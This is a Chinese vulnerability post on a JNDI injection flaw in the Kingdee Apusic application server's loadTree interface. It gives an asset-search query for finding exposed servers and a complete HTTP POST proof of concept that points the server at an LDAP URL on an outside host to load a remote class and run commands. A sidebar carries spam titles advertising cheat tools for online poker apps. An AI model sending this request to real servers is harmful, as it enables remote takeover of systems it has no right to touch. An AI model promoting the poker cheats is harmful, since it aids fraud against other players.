金蝶Apusic应用服务器 loadTree JNDI注入漏洞
创始人
2025-01-16 13:36:29
0

产品介绍

金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

漏洞概述

由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。

资产测绘

app.name=“Apusic 金蝶天燕 Server”

漏洞复现

在这里插入图片描述
测试POC:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1 Host: your_ip Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 55  jndiName=ldap://***.***.***.***/Basic/Command/calc 

弹出计算器进行验证
在这里插入图片描述

修复建议

官方已发布漏洞补丁,请联系软件厂商进行修复。

相关内容

热门资讯

我来分享!wepoke透明挂使... 我来分享!wepoke透明挂使用方法,wepokeai代打辅助,2025新版教程(有挂技巧)-哔哩哔...
必看攻略!(wepOkE)软件... 必看攻略!(wepOkE)软件透明挂辅助软件!(aapoker可以一直输)黑科技教程(2026已更新...
第七分钟体悟!约局吧开挂神器是... 第七分钟体悟!约局吧开挂神器是真的吗,线上德州的辅助器是什么(透视)教你攻略(的确有挂)1、约局吧开...
十分钟理解!wpk有机器人吗(... 十分钟理解!wpk有机器人吗(透明挂黑科技)外挂透明挂辅助神器(2026已更新)(哔哩哔哩);1、让...
黑科技神器!德州之星ai辅助,... 黑科技神器!德州之星ai辅助,wepower有辅助器,介绍教程(今日头条)-哔哩哔哩;大家肯定在之前...
玩家必知教程!(WPK脚本)外... 玩家必知教程!(WPK脚本)外挂软件透明挂辅助ai智能!(德州ai机器人)详细教程(2022已更新)...
7分钟辅助挂!aapoker脚... 7分钟辅助挂!aapoker脚本怎么用,wepoker有辅助工具吗(透视)黑科技教程(有挂秘诀)we...
七分钟掌握!wpk真的有外挂(... 七分钟掌握!wpk真的有外挂(透明挂黑科技)外挂透明挂辅助下载(2023已更新)(哔哩哔哩)是一款可...
技术分享!wepokewepo... 【福星临门,好运相随】;技术分享!wepokewepoke透视挂可以测试,德州ai辅助有用,微扑克教...
一分钟了解!(poker)外挂... 一分钟了解!(poker)外挂辅助透视助手!(wepoke辅助)科技教程(2022已更新)(哔哩哔哩...